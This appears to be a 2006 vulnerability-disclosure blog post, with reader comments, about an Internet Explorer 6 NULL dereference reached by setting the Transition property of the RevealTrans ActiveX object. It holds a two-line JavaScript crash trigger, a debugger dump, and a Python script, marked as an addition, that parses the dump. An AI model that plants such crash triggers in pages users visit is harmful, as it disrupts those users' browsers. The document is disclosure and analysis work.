Wednesday, July 12, 2006

MoBB #13: RevealTrans Transition

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the Transition property of this object triggers a NULL dereference.

var a = new ActiveXObject('DXImageTransform.Microsoft.RevealTrans.1');
a.Transition = 1;

Demonstration

eax=00000000 ebx=00000000 ecx=35cde0c4
edx=00174972 esi=02d701d8 edi=00000001
eip=35cde0fe esp=0012b240 ebp=0012b25c
dxtmsft!CDXTRevealTrans::put_Transition+0x3a:
35cde0fe 8b08 mov ecx,[eax] ds:0023:00000000=????????
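
The crash record above can be triaged mechanically to confirm that the fault is a read through a NULL base register rather than an access to an arbitrary address. The following is an added example, not code from the original post; the helper name triage and the 64 KB NULL-region threshold are assumptions of this example, and it handles only two-operand, mov-style instructions with a plain [reg] memory operand.

```python
import re

# Crash record copied from the post above: WinDbg registers, symbol, faulting instruction.
CRASH = """\
eax=00000000 ebx=00000000 ecx=35cde0c4
edx=00174972 esi=02d701d8 edi=00000001
eip=35cde0fe esp=0012b240 ebp=0012b25c
dxtmsft!CDXTRevealTrans::put_Transition+0x3a:
35cde0fe 8b08 mov ecx,[eax] ds:0023:00000000=????????
"""

# Windows leaves the first 64 KB of user address space unmapped by default,
# so a fault on an address below this limit is treated as a NULL dereference.
NULL_REGION = 0x10000

REG = re.compile(r"\b(e[a-z]{2})=([0-9a-f]{8})\b")
SYM = re.compile(r"^(\w+)!(.+)\+0x([0-9a-f]+):$", re.M)
INS = re.compile(r"^([0-9a-f]{8}) ([0-9a-f]+) (\w+) (\S+) "
                 r"\w+:[0-9a-f]{4}:([0-9a-f]{8})=(\S+)$", re.M)

def triage(text):
    """Hypothetical helper: classify a 32-bit WinDbg access-violation record."""
    regs = {name: int(val, 16) for name, val in REG.findall(text)}
    sym, ins = SYM.search(text), INS.search(text)
    if not (sym and ins):
        raise ValueError("symbol or faulting-instruction line not found")
    eip, _opcode, _mnemonic, operands, ea, value = ins.groups()
    if int(eip, 16) != regs.get("eip"):
        raise ValueError("instruction address does not match eip")
    ops = operands.split(",")
    mem = next((o for o in ops if o.startswith("[")), None)
    base = re.fullmatch(r"\[(e[a-z]{2})\]", mem or "")
    address = int(ea, 16)
    return {
        "module": sym.group(1),
        "function": sym.group(2),
        "offset": int(sym.group(3), 16),
        # Memory operand first means the instruction stores to it (mov-style only).
        "access": "write" if ops[0] == mem else "read",
        "address": address,
        "unmapped": set(value) == {"?"},
        # Cross-check the debugger's effective address against the base register.
        "base_reg": base.group(1) if base and regs[base.group(1)] == address else None,
        "null_deref": address < NULL_REGION,
    }

if __name__ == "__main__":
    for key, val in triage(CRASH).items():
        print(f"{key:10} {val}")
```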

This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.RevealTrans Transition Property NULL Dereference

3 Comments:

At 11:46 AM, Anonymous Anonymous said...

Other than #4 (Firefox) and #5 (Safari), the MoBB looks more like the MoIEBB: Month of Internet Explorer Browser Bugs. Not only that, but the Firefox bug was fixed in a point release before you posted the bug, and the Safari bug was fixed in the WebKit open source project on March 21 (r13415).

Are there any non-MSIE bugs to "look forward to" the rest of the month?

 
At 12:00 PM, Blogger hdm said...

Yup. There is a code execution bug in the latest version of Firefox, but tracking down how and why it works has been taking more time than I expected. There are dozens of bugs in Safari/Konqueror, but nothing really that interesting IMO. Opera 9.0 fixed most of the bugs I documented in 8.5, but I haven't had a chance to do more than a quick test. The IE bugs have been used as "filler" if you will until the rest of the testing is complete. Thanks for the feedback!

 
At 5:38 PM, Anonymous Anonymous said...

Does not crash IE7. Indeed, even before the code is allowed to run the user must click the Information Bar and allow it. Then the code can be run, but IE7 just reports a script error ("Unspecified error").

It doesn't crash my IE6 either. I get an "Automation server cannot create object" script error. It could be because I tightened up the default security settings. :)

 
